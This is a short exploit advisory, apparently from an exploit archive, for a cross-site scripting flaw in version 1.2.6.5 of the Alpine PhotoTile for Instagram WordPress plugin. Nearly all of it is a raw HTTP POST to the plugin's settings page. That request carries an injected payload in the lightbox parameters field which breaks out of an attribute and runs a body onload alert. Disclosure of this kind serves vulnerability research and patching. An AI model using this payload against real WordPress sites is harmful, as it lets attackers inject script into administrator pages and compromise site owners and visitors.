# ============================================================== # Title ...| XSS in Alpine PhotoTile for Instagram # Version .| Alpine PhotoTile for Instagram 1.2.6.5 # Date ....| 23.02.2014 # Found ...| HauntIT Blog # Home ....| http://wordpress.org/plugins/ # ============================================================== # ============================================================== # XSS ------ POST /k/wordpress/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=plugin-settings HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 300 hidden=Y&general_highlight_color=%2364a2d8&general_lightbox=alpine-fancybox&general_lightbox_params='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&general_block_users=&hidden_widget_alignment=1&cache_time=4&alpine-photo-tile-for-instagram-settings_plugin-settings%5Bsubmit-plugin-settings%5D=Save+Settings ------ # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/